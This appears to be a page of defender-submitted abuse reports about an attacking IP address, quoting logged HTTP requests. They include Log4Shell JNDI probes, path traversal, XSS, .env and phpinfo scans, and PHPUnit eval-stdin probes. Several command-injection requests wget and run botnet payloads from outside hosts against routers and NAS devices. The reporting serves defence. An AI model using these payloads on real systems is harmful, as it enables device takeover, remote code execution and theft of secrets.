Phishing attempt via svg file - microsoft credentials teft attempt.
SVG file contains js that red ...
show morePhishing attempt via svg file - microsoft credentials teft attempt.
SVG file contains js that redirects to https://files.docservercredentiials.com/${UNIQUELINK}?e={trackerValue}
show less
Large volume of requests against specific product API's (not general technology - but company / prod ...
show moreLarge volume of requests against specific product API's (not general technology - but company / product oriented).
Heavy scrapping of resources.
show less
Attacks against our API's incoming from this address detected. Automated tools like sqlmap or burp a ...
show moreAttacks against our API's incoming from this address detected. Automated tools like sqlmap or burp active scan were used.
show less
pma discovery and setup scripts + wordpress related paylaods on non wordpress non pma site
GET ...
show morepma discovery and setup scripts + wordpress related paylaods on non wordpress non pma site
GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
GET /program/index.php?lang=en HTTP/1.1
GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
GET /db/db-admin/index.php?lang=en HTTP/1.1
show less
Java related payloads (log4shell) & auth bypass exploits
POST /j_security_check HTTP/1.1
GET /?x= ...
show moreJava related payloads (log4shell) & auth bypass exploits
POST /j_security_check HTTP/1.1
GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1
GET / HTTP/1.1
POST /graphql HTTP/1.1
POST /mifs/j_spring_security_check HTTP/1.1
POST /suite-api/api/auth/token/acquire HTTP/1.1
POST /api/login HTTP/1.1
GET /webtools/control/main HTTP/1.1
POST /hybridity/api/sessions HTTP/1.1
GET /portal/info.jsp HTTP/1.1
POST /ui/login.action HTTP/1.1
POST /api/system/sessions HTTP/1.1
POST /ccmadmin/j_security_check HTTP/1.1
POST /suite-auth/login HTTP/1.1
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest HTTP/1.1
POST /zdm/cxf/login HTTP/1.1
GET /goanywhere/auth/Login.xhtml HTTP/1.1
POST /opennms/j_spring_security_check HTTP/1.1
POST /login HTTP/1.1
GET /c42api/v3/LoginConfiguration?url=https://localhost&username=${jndi:ldap://${hostName}.cgaug35brjf549vj0tjg4x7qqrw1p87ca.oast.online/test} HTTP/1.1
...
show less
mozi malware spread
27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi. ...
show moremozi malware spread
27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
show less
Already for a few days automated attacks are incoming against our services from this address
few ex ...
show moreAlready for a few days automated attacks are incoming against our services from this address
few examples
GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multiroot HTTP/1.1
GET /img.php?f=/./etc/./passwd HTTP/1.1
GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
show less
GET /shell?cd+/tmp;rm+-rf+arm7;wget+http:/x5C/45.95.55.157/bins/arm7;chmod+777+arm7;./arm7 selfrep.j ...
show moreGET /shell?cd+/tmp;rm+-rf+arm7;wget+http:/x5C/45.95.55.157/bins/arm7;chmod+777+arm7;./arm7 selfrep.jaws
GET /backupmgt/localJob.php?session=fail`wget%20-O-%20http%3A%2F%2F45.95.55.157%2Fseagate.sh%7Csh` HTTP/1.0
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/wget.sh;wget+http://45.95.55.157/wget.sh+-O+/tmp/wget.sh;sh+/tmp/wget.sh+selfrep.netgear&curpath=/¤tsetting.htm=1 HTTP/1.1
GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bwget%20http%3A%2F%2F45.95.55.157%2Fzyxel.sh%20-O%20-%20%7C%20sh%20%23+%23&password=asdf HTTP/1.1
GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20http://45.95.55.157/bins/mips%20-O%20/var/tmp/mips;%20chmod%20777%20/var/tmp/mips;%20/var/tmp/mips%20selfrep.africo;%20rm%20-rf%20/var/tmp/mips&curpath=/¤tsetting.htm=1 HTTP/1.1
GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.95.55.157/bins/x86 -O /tmp/.th; chmod 777 /tmp/.th; /tmp/.th selfrep.thinkphp
show less
GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://vzwebsite.ir/fuez/potar.sh${IF ...
show moreGET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://vzwebsite.ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1
show less
GET /.env HTTP/1.1
GET /_profiler/phpinfo HTTP/1.1
GET /phpinfo.php HTTP/1.1
GET /phpinfo HTTP/1. ...
show moreGET /.env HTTP/1.1
GET /_profiler/phpinfo HTTP/1.1
GET /phpinfo.php HTTP/1.1
GET /phpinfo HTTP/1.1
show less
GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://vzwebsite.ir/fuez/potar.sh${IF ...
show moreGET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://vzwebsite.ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1
show less
GET /api/.env HTTP/1.1
GET /.env HTTP/1.1
GET /.env.example HTTP/1.1
GET /server/.env HTTP/1.1
G ...
show moreGET /api/.env HTTP/1.1
GET /.env HTTP/1.1
GET /.env.example HTTP/1.1
GET /server/.env HTTP/1.1
GET /_profiler/phpinfo HTTP/1.1
GET /.env.local HTTP/1.1
GET /laravel/.env HTTP/1.1
show less
GET /phpinfo/info.php HTTP/1.1
GET /phpinfo.html HTTP/1.1
GET /_profiler/phpinfo/phpinfo.php HTTP/ ...
show moreGET /phpinfo/info.php HTTP/1.1
GET /phpinfo.html HTTP/1.1
GET /_profiler/phpinfo/phpinfo.php HTTP/1.1
GET /phpinfo.txt HTTP/1.1
GET /_profiler/phpinfo/info.php HTTP/1.1
GET /phpcustom_info/phpinfo.php HTTP/1.1
GET /php52/phpinfo.php HTTP/1.1
GET /apache/phpinfo.php HTTP/1.1
GET /phpinfo1.php HTTP/1.1
GET /phpinfo3.php HTTP/1.1
show less
GET /.env HTTP/1.1
GET //vendor/.env HTTP/1.1
GET //lib/.env HTTP/1.1
GET //lab/.env HTTP/1.1
PO ...
show moreGET /.env HTTP/1.1
GET //vendor/.env HTTP/1.1
GET //lib/.env HTTP/1.1
GET //lab/.env HTTP/1.1
POST //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
POST //phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
POST //phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
etc..
show less
POST //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdi ...
show morePOST //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
POST //vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
GET //v1/.env HTTP/1.1
GET //tools/.env HTTP/1.1
GET //v2/.env HTTP/1.1
GET //laravel/.env HTTP/1.1
GET //administrator/.env HTTP/1.1
etc...
show less